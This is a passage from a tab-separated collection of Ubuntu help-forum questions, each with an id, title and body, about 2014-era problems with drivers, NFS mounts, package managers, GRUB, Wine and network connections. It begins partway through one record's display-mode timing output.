start 1040 end 1136 total 1312 skew 0 clock 60.1khz v : height 768 start 769 end 772 total 800 clock 75.1hz 1024x768 ( 0x56 ) 65.0mhz h : width 1024 start 1048 end 1184 total 1344 skew 0 clock 48.4khz v : height 768 start 771 end 777 total 806 clock 60.0hz 1440x480i ( 0x57 ) 27.0mhz h : width 1440 start 1478 end 1602 total 1716 skew 0 clock 15.8khz v : height 480 start 488 end 494 total 525 clock 60.1hz 1440x480i ( 0x58 ) 27.0mhz h : width 1440 start 1478 end 1602 total 1716 skew 0 clock 15.7khz v : height 480 start 488 end 494 total 525 clock 60.1hz 800x600 ( 0x59 ) 49.5mhz h : width 800 start 816 end 896 total 1056 skew 0 clock 46.9khz v : height 600 start 601 end 604 total 625 clock 75.0hz 800x600 ( 0x5a ) 40.0mhz h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 720x576 ( 0x5b ) 27.0mhz h : width 720 start 732 end 796 total 864 skew 0 clock 31.2khz v : height 576 start 581 end 586 total 625 clock 50.0hz 720x480 ( 0x5c ) 27.0mhz h : width 720 start 736 end 798 total 858 skew 0 clock 31.5khz v : height 480 start 489 end 495 total 525 clock 60.0hz 720x480 ( 0x5d ) 27.0mhz h : width 720 start 736 end 798 total 858 skew 0 clock 31.5khz v : height 480 start 489 end 495 total 525 clock 59.9hz 640x480 ( 0x5e ) 31.5mhz h : width 640 start 656 end 720 total 840 skew 0 clock 37.5khz v : height 480 start 481 end 484 total 500 clock 75.0hz 640x480 ( 0x5f ) 25.2mhz h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 60.0hz 640x480 ( 0x60 ) 25.2mhz h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 59.9hz 720x400 ( 0x61 ) 28.3mhz h : width 720 start 738 end 846 total 900 skew 0 clock 31.5khz v : height 400 start 412 end 414 total 449 clock 70.1hz
498771	installing nvidia drivers for geforce gt 525m on 14.04	i 've been trying to install nvidia drivers for 14.04 so i can use a hdmi output on my laptop . however each time that i have tried to install nvidia drivers my screen is blank after logging in . i 've searched through a number of previous posts and none have sorted my issue .
498778	uim with anthy does not respond in normal text fields	this is on 14.04 xubuntu installed on a aspire s3 ( amd64 ) , kernel : 3.13.0-30-generic . a fresh install of uim ( and its dependencies ) , uim-el , and uim-anthy yields the following strange behavior : the uim toolbar appears in the panel at login with the null ime blue icon . as soon as a text field is selected , the icon vanishes , and only direct input is possible . however , it 's still running : ps acx | grep uim 5781 ? s 0:00 uim-xim 5782 ? sl 0:00 uim-toolbar-gtk 5788 ? s 0:00 uim-helper-serv i selected anthy-utf8 in the uim-im-switcher and hit apply with no change . uim definitely sees anthy , though . supported conversion engines : direct ( * ) anthy-utf8 ( ja ) using ibus is not an acceptable workaround for me because ibus does n't allow custom table imports in its anthy settings . this has to be some issue with the desktop integration , because uim-el is working just fine in emacs and it brings up the panel toolbar when invoked .
498779	mount nfs drive fails . portmapper problem ?	i have a server and node connected via ethernet . they both run ubuntu 12.04 . i share a file with nfs from the server but can not mount it on the node . here is some more info . node1 @ node1 : ~ $ sudo showmount -e 10.0.0.1 export list for 10.0.0.1 : /export/1tbhdd 10.0.0.0/24 /export/users 10.0.0.0/24 /export 10.0.0.0/24 node @ node1 : ~ $ sudo mount 10.0.0.1 : /export/1tbhdd /export/1tbhdd mount.nfs : rpc.statd is not running but is required for remote locking . mount.nfs : either use '-o nolock ' to keep locks local , or start statd . mount.nfs : an incorrect mount option was specified node @ nide1 : ~ $ rpcinfo -p program vers proto port service 100000 4 tcp 111 portmapper 100000 3 tcp 111 portmapper 100000 2 tcp 111 portmapper 100000 4 udp 111 portmapper 100000 3 udp 111 portmapper 100000 2 udp 111 portmapper 100024 1 udp 44469 status 100024 1 tcp 54570 status update ! ! node1 @ node1 : ~ $ rpcinfo -t 10.0.0.1 status program 100024 version 1 ready and waiting node1 @ node1 : ~ $ rpcinfo -p 10.0.0.1 program vers proto port service 100000 4 tcp 111 portmapper 100000 3 tcp 111 portmapper 100000 2 tcp 111 portmapper 100000 4 udp 111 portmapper 100000 3 udp 111 portmapper 100000 2 udp 111 portmapper 100024 1 udp 50938 status 100024 1 tcp 45700 status 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs 100227 2 tcp 2049 100227 3 tcp 2049 100003 2 udp 2049 nfs 100003 3 udp 2049 nfs 100003 4 udp 2049 nfs 100227 2 udp 2049 100227 3 udp 2049 100021 1 udp 53622 nlockmgr 100021 3 udp 53622 nlockmgr 100021 4 udp 53622 nlockmgr 100021 1 tcp 42091 nlockmgr 100021 3 tcp 42091 nlockmgr 100021 4 tcp 42091 nlockmgr 100005 1 udp 58516 mountd 100005 1 tcp 54688 mountd 100005 2 udp 41505 mountd 100005 2 tcp 46698 mountd 100005 3 udp 41559 mountd 100005 3 tcp 47812 mountd
498782	can not login through the command line	i have only been using ubuntu for about three weeks so do not be surprised if you lose me trying to explain something , i will try my best to be as detailed when needed though . anyways , unity right now is borked . whenever i login after having updated and restarted a few days ago the entire interface is missing . the only things i can see are the background picture and a folder for blender 3d . launching blender causes it to appear then promptly minimize into oblivion . trying to right click and change the background gives me an error with gnome ( as i think it is called ) and the desktop terminal ( control-alt-t ) does not work either . so with all that said and done i have written down a bunch of codes to reset unity and/or reinstall gnome but i can not access the command terminal , ctrl-alt-f1 . when i come to the login screen i press the command to bring up the command line interface where i am asked to enter my login information . i enter my user name and password and always receive an invalid password error . i was able to access it in the past to install proprietary drivers to use cuda in blender but now i can not . the password works in the basic login screen so i assume that there is something wrong with my username . it is simply my first name , a space , then my final initial ended with a period . could spaces randomly placed before , after , and in the middle be contributing to my problem ? is there any way to copy the username from the login page and paste it into the login portion of the command line ?
498783	xubuntu : audio does not work	i just installed xfce on an acer 3000 to bring it back to life ( 1gb ddr ram , sempron 3100+ 1.8ghz ) , because it 's pretty old . the first thing i did after i installed it was setting up the wifi , but then when i tried to test the sound it did not work . i tried to search for the driver but did not know what to do or even where to start .
498785	can not update ubuntu due to broken package	when i run software updater i get the package system is broken check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f that command entry returns with $ apt-get install -f e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ?
498787	ubuntu 12.04 display resolution issue after driver installtion	i installed ubuntu 12.04 lts 32-bit and everything worked perfectly . the display was recognized correctly as ( viewsonic corporation 22 '' ) and the resolution was adjustable . now the display shows up as `` laptop '' and does not allow control of the screen resolution . it appears that the correct driver is no longer being used . i think we inadvertantly installed nvidia drivers which caused this issue . the display adapter is an ati firepro v4800 . how can i restore the system so that my display is correctly recognized ?
498789	background job ( launched with ' & ' ) stops on logout	i am using aws to setup a node.js server . i launch node in the background by the following command : node server.js & however , when i log out , the process ends . from my previous 'nix experience , i was under the impression it should stay running . what am i doing wrong ? how to keep the process alive even after terminal logs out ?
498790	ubuntu 14.04 - network card not showing up	my network card is n't showing up when i run ifconfig or iwconfig , but it shows up when i run lspci -nn | grep 0280
498791	fix âthe system is running in low-graphics modeâ error without internet	i 'm very sorry for asking about this error in another question but all the solutions in here require for you to have internet . i only have wireless internet and when i am in that console the internet is not connected , therefore i can not install , update or reinstall anything . i 'm using ubuntu 14.04 and i have the hp pavilion 17-e020sq laptop ( which has an intel graphics and a dedicated ati one ) . also i checked how to connect to wifi from terminal but it seems for connecting to internet from terminal i have to first be connected to internet and download a bunch of stuff . it 's pretty disappointing that this is still happening in this year 's ubuntu ...
498792	fails to download respository information check internet connection	my internet connection is working , but i can not download anything from software center and i can not update or upgrade from the terminal . i changed my /etc/apt/sources.list to activate all the sources i have . none of them worked .
498794	md5 says the checksum is correct but still `` check finished : errors found in 2 files ''	i 'm attempting to dual boot windows 8.1 and ubuntu but i ca n't quite seem to create a usb boot drive without errors . twice now i have downloaded ubuntu-14.04-desktop-amd64 from the official website , twice have the file 's checksums been cross-referenced by winmd5sum with the md5 hash here : https : //help.ubuntu.com/community/ubuntuhashes , twice have i created a usb boot drive with universal-usb-installer-1.9.5.4 , and twice have i checked for defects with the result being `` check finished : errors found in 2 files ! '' what 's going wrong ?
498795	ubuntu 14.04 64-bit can not connect to the internet	i 'm a beginner at ubuntu , and i really do n't know that many commands for the terminal . basically , ubuntu is having trouble connecting to the internet . it connects and it connects , and it fails . this process repeats until it starts asking me for the password to the wifi , even though it 's correct . all other computers in my house can connect just fine . lspci -nn | grep 0280 : 03:02.0 network controller [ 0280 ] : ralink corp. rt2561/rt61 802.11g pci [ 1814:0301 ] any help ?
498801	mount single logical partition from image of entire disk ( device )	the method below works to mount a primary partition from the disk image , but fails trying to mount a logical partition under an extended partition . is there a way around this ? i have 3 logical partitions under the extended partition and none of these will mount using the steps below . get the partition layout of the image $ sudo fdisk -lu sda.img ... units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes ... device boot start end blocks id system sda.img1 * 56 6400000 3199972+ c w95 fat32 ( lba ) calculate the offset from the start of the image to the partition start sector size * start = ( in the case ) 56 * 512 = 28672 mount it on /dev/loop0 using the offset sudo losetup -o 28672 /dev/loop0 sda.img now the partition resides on /dev/loop0 . you can fsck it , mount it etc sudo fsck -fv /dev/loop0 sudo mount /dev/loop0 /mnt unmount sudo umount /mnt sudo losetup -d /dev/loop0
498802	14.04 server grub install fatal error	this is the third time i 've gotten this fatality when attempting to install the server distros . the fatal error comes at around 50 % through the grub installation . the popup window does n't tell me what happened to cause the crash , and i can finish the install without a bootloader , but now i 've got a 130gb partition on my server that i need to have up and running with no usable operating system on it . i 've looked at people with similar problems , but with no definitive answers to my problem . i 'm relatively new to the command line section of linux so do n't assume knowledge when presenting fixes . right now i 'm attempting to do a complete install on a dell optiplex 980 with bios version a04 . i can only boot into my flash-drive which has the installer on it , and i 've failed all attempts to rescue the system from there . from what i understand , lilo is a possibility , but it 's obsolete and not recommended . is there a way to manually install grub or something ? i 'm willing to give any more information about my box should the need arise . update : problem is grub is attempting to install on dev/sda and i need it on dev/sdb .
498805	is it safe to install ubuntu in legacy mode ?	i think i installed windows with uefi but either way i want windows gone . i am currently using ubuntu 14.04 lts from a live usb . when i try to boot in uefi mode i get a black screen and when i hit `` try ubuntu '' it dosent do anything , but in legacy mode it works fine . is it safe to install ubuntu in legacy mode ( i dont plan on dual booting , i want to fully replace windows with ubuntu , meaning ubuntu wiping the drive and installing itself in windows place ) btw i have windows 8.1 if that helps . i tried to install and it says no other operating systems found . does it even matter what mode i do it in ? it will just wipe the drive and install ubuntu right ? i have 4 partitions all windows so should i get rid of the recovery partitons before i install ubuntu or should i just leave them ? sorry if this is confusing im a complete ubuntu noob and i just want some answers please . thank you for your time : )
498810	problems with dual monitor support in lubuntu 14.04	i recently upgraded to lubuntu 14.04 from 13.10 . most things are working correctly but i have a few problems with my dual monitor setup . my video card is an amd radeon hd 7640g and i am using the catalyst drivers . i am using my laptop screen and a television through hdmi , the biggest problem i have is that when i leave my computer for too long it suspends and upon waking the primary laptop screen is either black , or completely screwed up , and garbled , it looks like small repeated elements of the screen , hard to describe . however , the second monitor works fine . the second problem is that i can not change the background on the second monitor . if i change background in desktop preferences it only changes the first monitor , the laptop .
498811	lop failure : wine crash , .net needed , and steam stuck	i 'm trying to install a game ( magicka ) and i 'm always facing three problems every time i retry installing the game . first the installer installs wine ( 1.5.20 ) and extract it . then i choose installing the magicka steam version . 1st problem : the next step is installing .net framework 2.0 , which appears for half a second , which is followed by the error message in the installer : error in pol_wine wine seems to have crashed if your program is running , just ignore this message i press next and continue . i do n't know if i should take this error seriously . 2nd problem : installer starts installing many items : xna 3.1 , .net framework 2.0 , .net framework 2.0 sp1 , .net framework 2.0 sp2 , .net framework 3.0 ..etc at one point , a new box appears with the message : you must first install microsoft .net framwork 2.0sp1 before installing or reparing this product i press ok , and the program continues . 3rd problem : eventually the installer finishes , and displays a normal message saying : when magicka download by steam finished , do not click on play . close completely the steam interface , so that the installation script can continue which is fine . i press next . and steam starts updating in a new window . the window for update then becomes stuck on updating steam at a certain point ( eg 19,232 of 119,323 kb ) which continues for hours . other problems : in some of the hundred times i restarted the process , a couple of times the process stopped completely . this happened to two files , steam.exe and update.exe . the message : the program [ choose from above ] .exe has encountered a serious problem and needs to close . we are sorry for the inconvenience . thank you for the help .
498813	why does my wallpaper look slightly desaturated ?	here 's a screenshot of the original image overlaid on top of the same image set as wallpaper . the original is far more saturated . is this a bug or is there a setting i can tweak to get my wallpaper to be as saturated as the original image ?
498815	problem booting up	i tried downloading ubuntu on my computer with windows 8 . i followed all the steps . i have it downloaded on my hard drive and on a flash drive , and i ca n't boot up from either of them . when i reboot my computer , it sends me to a page that says windows failed to start because of a hardware or software change . i press enter to go to os selection . it gives me the option of windows 8 or ubuntu . i select ubuntu , but it sends me back to the same screen . i 've tried this several times and nothing changes . i go into my usb flash drive and go to the files it downloaded . it said i needed to uninstall ubuntu and re-install it . i tried this , rebooted my computer . same thing . the black screen where it says windows failed to load , it also gives me this information : file : \ubuntu\winboot\wubildr.mbr status : 0xc000007b info : the application or operating system could not be loaded because there are required files that are missing or it contains errors . what could the missing files or errors be ?
498821	is there a way to set up zpanel or webmin without uninstalling lamp first ?	i set up my server manually and am pretty happy with it . it 's been a job of months , chipping away at it every day , and at this point i do n't want to reinstall lamp . but all server management software that i 've looked into , like zpanel and webmin , require a fresh install of everything -- apache , mysql , php . actually , the instructions are to use a fresh install of ubuntu period . is there a way around this , or a server management software that can go on top of my existing installation ? at this point i might just try to back up everything as well as possible and reinstall , but i 'd rather not . it took me a long time to get the server running the way i want , and some tasks were not trivial ( to me ) .
498822	how to enter setup ubuntu 14.04	after installing ubuntu 14.04 on my dell m5030 laptop as a dual boot with windows 7 , i do not get an opportunity to enter setup . the computer on a cold start or on a warm reboot goes directly to the grub menu . is there a way to repair ? gb
498824	how can i disable password on termina ?	i am trying to install a software through terminal . it asks for my password and i have given the correct password but still it says wrong password . then i removed all kind off password from my login account . but still it asks for the password . i am using ubuntu 14.04 . can anyone help me please .
498825	what is the best solution for virtualizing win32 applications on a linux host ?	i currently have a linux server that handles operations for windows clients and i need a way to share a windows application ( somehow installed on the linux server ) through the server 's vpn to a windows client outside of our lan .
498827	how to remove fakeraid	i had a raid 1 setup using by bios . ubuntu was installed on the raid array . i want to move to a software raid 5 using mdadm with 3 disks . i have deactivated the raid 1 in the bios , copied the operating system to a separate drive . 2 of the 3 disks was previously in the fakeraid . fdisk still shows the fakeraid and has somehow marked the raid as active . when i try to setup the raid 5 i get an error that the first drive ( sdb ) is busy . dmraid does not detect any raids and does nothing . anybody have a solution ? thanks
498828	how to customize workplace for it to be unique	i am using the advantage of workspace which most linux os has , but it will be more usefull for me if i can customize it . is there some way to customize ubuntu 14.04 to make workspace to have unique content in each desktop ? eg . unique folder , unique application shortcut . thanks .
498830	citrix receiver - mouse with a strange black box	when i logged in my work environment from citrix receiver in windows it works normally . when i tried the same in ubuntu it works but there is a black box about double size of mouse pointer . it does work but it seems too strange . is there some specific configuration that i could look at ?
498834	playonlinux wo n't start	when i click on the icon nothing happens . in the terminal when i run playonlinux i get the following . importerror : no module named wxversion looking for python ... 2.7.7 - selected traceback ( most recent call last ) : file `` mainwindow.py '' , line 31 , in < module > import wxversion importerror : no module named wxversion
498842	installing lubuntu 14.04 on old laptop celeron m	i 've been trying to install lubuntu 14.04 on an old laptop in place of xubuntu to see if it runs any better . i 've seen that 14.04 only supports pae , but in the info for lubuntu it says you can use `` forcepae '' as a boot option to get around it . just trying to boot the live cd results in a blinking underline and it never does anything . i 've tried pressing shift at power up but never get a menu to put that option in . this all happens in a matter of less than 5 seconds . is there any way to at least try it from the live media ?
498846	insert the data in my xml file in a database in linux	my question is how to insert the data in my xml file in a database in linux .
498850	software center crashes on open and apt-get broken ubuntu 14.04	so i started using 14.04 by upgrading from 12.04 about a month or two ago , and in the last week , i 've noticed i can no longer start up software center , and a few days ago > sudo apt-get stopped working . doing apt-get returns this error or something similar for everything i try to install : > reading package lists ... error ! > e : encountered a section with no package : header > e : problem with mergelist /var/lib/apt/lists/repository.spotify.com_dists_stable_non- > free_i18n_translation-en % 5fus > e : the package lists or status file could not be parsed or opened . and running software center from command line does this : 2014-07-16 23:20:34,160 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-07-16 23:20:34,825 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2014-07-16 23:20:34,829 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2014-07-16 23:20:34,836 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2014-07-16 23:20:34,835 - root - error - could not find any typelib for launchpadintegration 2014-07-16 23:20:34,904 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2014-07-16 23:20:35,623 - softwarecenter.backend.reviews - warning - error creating bsddb : ' ( 22 , 'invalid argument -- bdb0054 illegal flag combination specified to db_env- > open ' ) ' ( corrupted ? ) 2014-07-16 23:20:35,623 - softwarecenter.backend.reviews - error - trying to repair db failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 358 , in _save_review_stats_cache_blocking self._dump_bsddbm_for_unity ( outfile , outdir ) file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 377 , in _dump_bsddbm_for_unity 0600 ) dbinvalidargerror : ( 22 , 'invalid argument -- bdb0054 illegal flag combination specified to db_env- > open ' ) /usr/lib/python2.7/dist-packages/gi/overrides/glib.py:535 : warning : source id 68 was not found when attempting to remove it return super ( maincontext , self ) .iteration ( may_block ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 261 , in open self._cache = apt.cache ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 107 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 151 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/repository.spotify.com_dists_stable_non-free_i18n_translation-en % 5fus , e : the package lists or status file could not be parsed or opened . 2014-07-16 23:20:37,934 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 281 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 183 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1378 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1316 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 150 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 227 , in init_view self.cache , self.db , self.icons , self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 80 , in __init__ self.build ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 326 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 121 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 255 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 240 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 131 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 330 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 225 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 281 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__'
498851	3rd party software installations	can you install 3rd party software on ubuntu ? we use microsoft office at my business and i word like to install it onto ubuntu to prevent any formatting problems at work . is this possible ?
498853	what version of gcc is used by the make command ?	is there any way to know what version of gcc is used by the make command ? i have 5 versions installed of gcc on my computer : by dpkg -l | grep gcc ii gcc 4:4.8.2-1ubuntu6 i386 gnu c compiler ii gcc-4.6 4.6.4-6ubuntu2 i386 gnu c compiler ii gcc-4.6-base : i386 4.6.4-6ubuntu2 i386 gcc , the gnu compiler collection ( base package ) ii gcc-4.8 4.8.2-19ubuntu1 i386 gnu c compiler ii gcc-4.8-base : i386 4.8.2-19ubuntu1 i386 gcc , the gnu compiler collection ( base package ) ii gcc-4.9-base : i386 4.9-20140406-0ubuntu1 i386 gcc , the gnu compiler collection ( base package ) ii libgcc-4.8-dev : i386 4.8.2-19ubuntu1 i386 gcc support library ( development files ) ii libgcc1 : i386 1:4.9-20140406-0ubuntu1 i386 gcc support library
498864	how to speed up ubuntu 14.04 in virtualbox 4.3.10	my virtualbox running ubuntu 14.04 but seep is very slow . virtualbox : 4.3.10 ubuntu : 14.04 virtualbox addon : 4.3.10 i have tried suggestion from post : why does a ubuntu guest in virtualbox run very , very slowly ? but does n't work .
498868	no sound in headphones , asus k56cm	i am having an issue . my speakers work perfectly fine , but my headphones are mute . i checked mixer , played with config files and still nothing . i killed a whole day to get to ubuntu and i am still troubled . please , help me to deal with it . here is some specific info : intel速 hm76 chipset 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) ubuntu 14.04
498873	how to install xrdp on ubuntu 14.04 ( trusty ) ?	i have tried to install xrdp on ubuntu using apt-get install xrdp , but have run into issues similar to other users such as listed in these posts : ubuntu 14.04 xrdp grey no login box for xrdp blank remote desktop 13.04 how do i set up xrdp session that reuses an existing session ? copy and pasting issues with xrdp how can i install xrdp easily and robustly ?
498880	how do i upgrade to lubuntu saucysalamder ?	i am using lubuntu on a virtual machine and have many files on here . months ago , i kept getting pop-ups which asked me to update to lubuntu 13.10 ( i believe it was 13.10 ) saucy salamander but i kept saying 'remind me later ' . now , i ca n't apt-get install anything and i keep getting these type of errors : 404 not found [ ip : 91.189.92.201 80 ] this post ( http : //ubuntuforums.org/showthread.php ? t=2103751 ) suggested that i upgrade ( i should upgrade to lubuntu saucy salamander ) . i do n't want to download anything from here ( https : //help.ubuntu.com/community/lubuntu/getlubuntu ) because i am afraid i will lose all my important files . instead , i kept waiting till i got that pop-up again asking if i want to upgrade but i never get that popup anymore . i tried restarting my vm but still no popup . i then tried starting up the software updater but it keeps giving me an error saying : failed to download repository information . check your internet connection . even though i can access the internet with no problems . i tried installing packages from synaptic package manager but it also gave me the 404 not found [ ip : 91.189.92.201 80 ] errors . how do i upgrade to lubuntu 13.10 saucy salamander ? or how do i get lubuntu to send me that 'upgrade to saucy salamander ' pop up again ? the one time i want to get the popup , i 'm not getting it anymore -.- .
498884	ca n't connect most of the time for one https site	there have been numbers of posts which are similar to this , but none of them can solve my problem . i have a problem with connecting one site which in only https connection allowed . when i tried to connect that site with windows operating system or any device under different wifi or vpn connection , it worked fine . however , if i try to connect to the site with home wifi , i can not connect from either android or ubuntu laptop . actually it works sometime , but it times out after i click something such as submit comment button or other posts . here is a what curl showed me when the site works in ubuntu . curl -v https : //********* * rebuilt url to : https : //******* * hostname was not found in dns cache * trying *ip address* ... * connected to ********** ( ip address ) port 443 ( # 0 ) * successfully set certificate verify locations : * cafile : none capath : /etc/ssl/certs * sslv3 , tls handshake , client hello ( 1 ) : * sslv3 , tls handshake , server hello ( 2 ) : * sslv3 , tls handshake , cert ( 11 ) : * sslv3 , tls handshake , server key exchange ( 12 ) : * sslv3 , tls handshake , server finished ( 14 ) : * sslv3 , tls handshake , client key exchange ( 16 ) : * sslv3 , tls change cipher , client hello ( 1 ) : * sslv3 , tls handshake , finished ( 20 ) : * sslv3 , tls change cipher , client hello ( 1 ) : * sslv3 , tls handshake , finished ( 20 ) : * ssl connection using ecdhe-rsa-aes256-gcm-sha384 * server certificate : * subject : description=6nxkigo8ryczjf55 ; c=us ; cn=************ ; emailaddress=******* * start date : 2013-10-13 16:40:04 gmt * expire date : 2014-10-14 14:38:36 gmt * subjectaltname : ********* matched * issuer : c=il ; o=startcom ltd. ; ou=secure digital certificate signing ; cn=startcom class 1 primary intermediate server ca * ssl certificate verify ok. > get / http/1.1 > user-agent : curl/7.35.0 > host : ************ > accept : */* > < http/1.1 200 ok * server nginx is not blacklisted < server : nginx < date : thu , 17 jul 2014 05:55:40 gmt < content-type : text/html ; charset=utf-8 < transfer-encoding : chunked < connection : keep-alive < vary : accept-encoding < cache-control : no-cache , must-revalidate , post-check=0 , pre-check=0 < pragma : no-cache < < ! doctype html public `` -//w3c//dtd xhtml 1.0 transitional//en '' `` http : //www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd '' > < html xmlns= '' http : //www.w3.org/1999/xhtml '' xml : lang= '' en '' lang= '' en '' > < head > < title > t < /title > < meta http-equiv= '' x-ua-compatible '' content= '' chrome=1 ; ie=edge '' / > < meta http-equiv= '' content-type '' content= '' text/html ; charset=utf-8 '' / > < link rel= '' shortcut icon '' href= '' favicon.ico '' / > < link href= '' static/styles/public/style.css ? v=1403160309 '' rel= '' stylesheet '' type= '' text/css '' / > < script src= '' static/functions/sizzle.js '' type= '' text/javascript '' > < /script > < script src= '' static/functions/script_start.js ? v=1403160309 '' type= '' text/javascript '' > < /script > < script src= '' static/functions/class_ajax.js ? v=1403160309 '' type= '' text/javascript '' > < /script > < script src= '' static/functions/class_cookie.js ? v=1403160309 '' type= '' text/javascript '' > < /script > < script src= '' static/functions/class_storage.js ? v=1403160309 '' type= '' text/javascript '' > < /script > < script src= '' static/functions/global.js ? v=1403160309 '' type= '' text/javascript '' > < /script > < /head > < body > < div id= '' head '' > < span > ssl < /span > < /div > < table id= '' maincontent '' > < tr > < td align= '' center '' valign= '' middle '' > < div id= '' logo '' > < ul > < li > < a href= '' index.php ? lang= '' > home < /a > < /li > < li > < a href= '' login.php ? lang= '' > login < /a > < /li > < ! -- /* < li > < a href= '' support/ '' > help desk < /a > < /li > */ -- > < /div > < div id= '' subtext '' > < br / > < br / > < br / > 2014 < /div > < /td > < /tr > < /table > < div id= '' foot '' > < span > & nbsp ; < /span > < /div > < /body > < /html > * connection # 0 to host ********* left intact whenever i can not connect to the site , curl shows me timeout has reached . is this just linux problem ? since timeout only occurs in ubuntu and android . i use dd-wrt firmware on my router and dmz to one home media server .
498885	how do i access network file share ?	ubuntu/linux nu-b here . i have a physical ubuntu server sharing a folder and is accessible via windows gui . i installed another ubuntu server under vmworkstation as a virtual machine and is on the network and can go to internet and can ping the local network as well . i need to access the shared folder which is in the physical ubuntu server from my virtual ubuntu server via cmd line ... . any help is appreciated .
498886	teac cab-200 card reader and device names	i am running ubuntu 14 on two dell 690 computers . on one machine , the usb card reader devices are always enumerated last which results in a the card reader showing up as /dev/sde-sdh . on the other machine sometimes the card reader shows up as sde-sdh and sometimes it shows as sda-sdd ) is there any way that i can force the 2nd machine to enumerate the usb devices after the hard drives just like the first machine ? this problem is driving me a little nuts . i do not want to create symlinks for the card reader devices . richard
498888	whenever i delete jabber and yahoo from my online accounts list , they reappear	whenever i delete jabber and yahoo from my online accounts list , they reappear after a restart . because of this , whenever i open login , i get a large number of popups asking for my yahoo password : i do n't mind if yahoo ! says in the list , but i really need these popups to go . even if i type my password for each one , they open up next time i log in . i 'm using gnome on ubuntu 14.04 . this did n't happen before in unity , but i ca n't switch back to it .
498889	can not boot from ssd on samsung np530u4c	i wanted to install ubuntu for my samsung np530u4c on ssd . there are 2 drives available in this machine one is 750 gb hdd and 24 gb issd . but ssd one is not available in boot loader . after i tried to install ubuntu on ssd and restarted the machine , i was stuck at the splash screen of samsung motherboard . it kept restarting . after a quick research i thought it was because i deleted grub2 loader . then i tried to repartition and install again . i put 500 mb /boot ext2 partition on hdd , 5000 mb swap area on hdd , and 24 gb / ext4 partition on ssd . and set bootloader on hdd . but this time en error occured `` grub-install /dev/sda failed '' . so i just wanted to install ubuntu on ssd , but failed . how could i achieved that now ?
498890	is amd64 the only 64-bit version of ubuntu 12.04 lts desktop ?	i need to specifically install ubuntu 12.04 lts desktop on a dell poweredge server . the main site allows you to download 14.04 lts . so i followed this link to 12.04 : http : //releases.ubuntu.com/12.04/ the problem is the download links are only available as i386 ( which is the 32-bit version ) or amd64 ( which i assumed was for an amd process , not an intel ) . should i still use amd64 download even if i am not using an amd processor ?
